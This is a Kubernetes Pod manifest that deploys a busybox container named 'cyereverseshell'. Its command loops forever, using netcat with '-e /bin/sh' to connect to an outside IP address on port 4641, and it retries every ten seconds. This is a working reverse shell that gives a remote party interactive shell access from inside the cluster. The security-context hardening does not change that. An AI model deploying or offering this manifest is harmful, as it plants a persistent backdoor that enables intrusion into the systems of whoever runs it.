apiVersion: v1
kind: Pod
metadata:
  name: cyerspod
  namespace: nati
  labels:
    app: nc
spec:
  containers:
  - name: cyereverseshell
    image: busybox
    args: ["/bin/sh", "-c", "while true; do echo 'Connecting...'; nc -e /bin/sh 68.183.22.232 4641 || echo 'Connection failed'; sleep 10; done"]
    securityContext:
      runAsNonRoot: true  # Ensure the container does not run as root
      runAsUser: 1000  # Set non-root UID
      allowPrivilegeEscalation: false  # Prevent privilege escalation
      capabilities:
        drop: ["ALL"]  # Drop unnecessary capabilities
      seccompProfile:
        type: RuntimeDefault
